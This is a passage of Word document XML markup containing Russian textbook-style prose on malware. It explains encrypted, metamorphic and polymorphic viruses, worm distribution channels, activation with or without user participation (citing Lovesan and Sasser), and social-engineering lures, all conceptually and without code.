          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русов требует от пользователя владения большим объемом специфических знаний в области программирования, работы операционных систем и т. д. С</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">временные вредоносные программы используют сложные технологии </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>маск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровки и защиты своих копий, которые обуславливают необходимость применение специал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных средств для их анализа.</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Процесс подготовки вредоносной программой своих копий для распр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>странения может существенно отличаться от простого копирования. Авторы наиболее сложных в технологическом плане вирусов стараются сделать разные копии максимально непохожими для усложнения их обнаружения антивиру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ными средствами. Как следствие, составление сигнатуры для такого вируса крайне затруднено.</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При создании копий для маскировки могут применяться следующие те</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нологии:</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Шифрование - вирус состоит из двух функциональных блоков: собстве</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>но вируса и шифратора. Каждая копия вируса состоит из шифратора, случайн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го ключа и вирусного блока, зашифрованного этим ключом</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Метаморфизм - создание различных копий вируса путем замены групп команд на эквивалентные, перестановки местами блоков кода, вставки между значащими кусками кода «мусорных» команд, которые практически ничего не делают</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Сочетание этих двух технологий приводит к появлению следующих т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пов вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Шифрованный вирус - вирус, использующий простое шифрование со случайным ключом и неизменный шифратор. Такие вирусы легко обнаруж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ваются по сигнатуре шифратора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Метаморфный вирус - вирус, применяющий метаморфизм ко вс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>му своему телу для создания новых копий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Полиморфный вирус - вирус, использующий метаморфный шифр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тор для шифрования основного тела вируса со случайным ключом. При этом часть информации, используемой для получения новых копий шифратора, та</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>же может быть зашифрована. Например, вирус может реализовывать нескол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко алгоритмов шифрования и при создании новой копии менять не только к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>манды шифратора, но и сам алгоритм. Рассматривая современные вирусные угрозы необходимо отметить, что более 90% процентов вирусных угроз в п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следнее время связаны с червями. Наиболее многочисленную группу в этом классе вредоносных программ составляют почтовые черви. Интернет-черви также явл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ются заметным явлением, но не столько из-за количества, сколько из-за качес</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ва: эпидемии, вызванные Интернет- червями зачастую отличаются высокой скоростью распространения и большими масштабами. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IRC </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и P2P черви встречаются достаточно редко, чаще </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IRC </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">P2P </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>служат альтернативными кан</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лами распространения для почтовых и Интернет-червей. Распространение ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рез </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LAN </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>также используется преимущественно как дополнительный способ распростр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нения.</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lastRenderedPageBreak/>
        <w:t>Кроме того, на этапе активации червей можно разделить на две большие группы отличающиеся как по технологиям активации, так и по срокам жизни:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для активации необходимо активное участие пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для активации участие пользователя не требуется вовсе либо д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>статочно лишь пассивного участия</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Активация сетевого червя без участия пользователя всегда означает, что червь использует бреши в безопасности программного обеспечении компь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тера. Это приводит к очень быстрому распространению червя внутри корпор</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тивной сети с большим числом станций, существенно увеличивает загрузку к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>налов связи и может полностью парализовать сеть. Именно этот метод актив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ции использовали черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lovesan </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sasser. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Под пассивным участием пользов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>теля понимается, например, просмотр писем в почтовом клиенте, пи котором пользователь не открывает вложенные файлы, но его компьютер тем не менее оказывается зараженным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Активное участие пользователя в активации червя означает, что польз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ватель был введен в заблуждение методами социальной инженерии. В бол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>шинстве случаев основным фактором служит форма подачи инфицированного сообщения: оно может имитировать письмо от знакомого человека (включая электронный адрес, если знакомый уже заражен), служебное сообщение от по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>товой системы или же что-либо подобное, столь же часто встречающееся в п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>токе обычной корреспонденции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При заражении компьютера черви обычно производят следующие де</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
